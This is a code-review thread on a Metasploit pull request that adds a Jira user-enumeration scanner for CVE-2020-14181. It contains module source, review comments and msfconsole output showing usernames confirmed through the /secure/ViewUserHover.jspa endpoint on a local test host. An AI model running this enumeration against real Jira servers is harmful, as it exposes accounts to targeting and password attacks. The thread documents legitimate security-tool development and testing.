modules/auxiliary/scanner/http/jira_user_enum.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Jira Users Enumeration',
+        'Description' => %q{
+          This module exploits an information disclosure vulnerability that allows an
+          unauthenticated user to enumerate users in the /ViewUserHover.jspa endpoint.
+          This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
+          Discovered by Mikhail Klyuchnikov @__mn1__
+          This module was only tested on 8.4.1
+        },
+        'Author' => [ 'Brian Halbach' ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['URL', 'https://jira.atlassian.com/browse/JRASERVER-71560'],
+            ['CVE', '2020-14181'],
+          ],
+        'DisclosureDate' => '2020-08-16'
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Jira Path', '/']),
+      ]
+    )
+    deregister_options('PASS_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'STOP_ON_SUCCESS', 'BLANK_PASSWORDS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'PASSWORD')
```

Comment:
I would keep the `DB_ALL_USERS` option enabled. When set to `true`, it tells the scanner to also use any username present in the database, which can be very useful.

That said, this feature has a bug and it's been fixed in this [PR](https://github.com/rapid7/metasploit-framework/pull/14748). So, you will have to apply this fix first, or wait for this PR to be merged, if you want to test this functionality.

```
msf6 auxiliary(scanner/http/jira_user_enum) > creds add user:test2
msf6 auxiliary(scanner/http/jira_user_enum) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------
                       test2

msf6 auxiliary(scanner/http/jira_user_enum) > options

Module options (auxiliary/scanner/http/jira_user_enum):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             8080             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Jira Path
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          test1            no        A specific username to authenticate as
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf6 auxiliary(scanner/http/jira_user_enum) > set DB_ALL_USERS true
DB_ALL_USERS => true
msf6 auxiliary(scanner/http/jira_user_enum) > run

[*] Begin enumerating user at 127.0.0.1/secure/ViewUserHover.jspa?username=
[*] checking user test1
[+] 'User exists: test1'
[*] Begin enumerating user at 127.0.0.1/secure/ViewUserHover.jspa?username=
[*] checking user test2
[+] 'User exists: test2'
[+] 2 Users found: test1, test2
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Reply:
I believe https://github.com/rapid7/metasploit-framework/pull/14748 has been merged and `DB_ALL_USERS` can be enabled again.

Reply:
I enabled DB_ALL_USERS, and initial testing worked for me. Sorry, I have been so slow to respond, I am in the middle of my OSCP but will make and test more changes soon.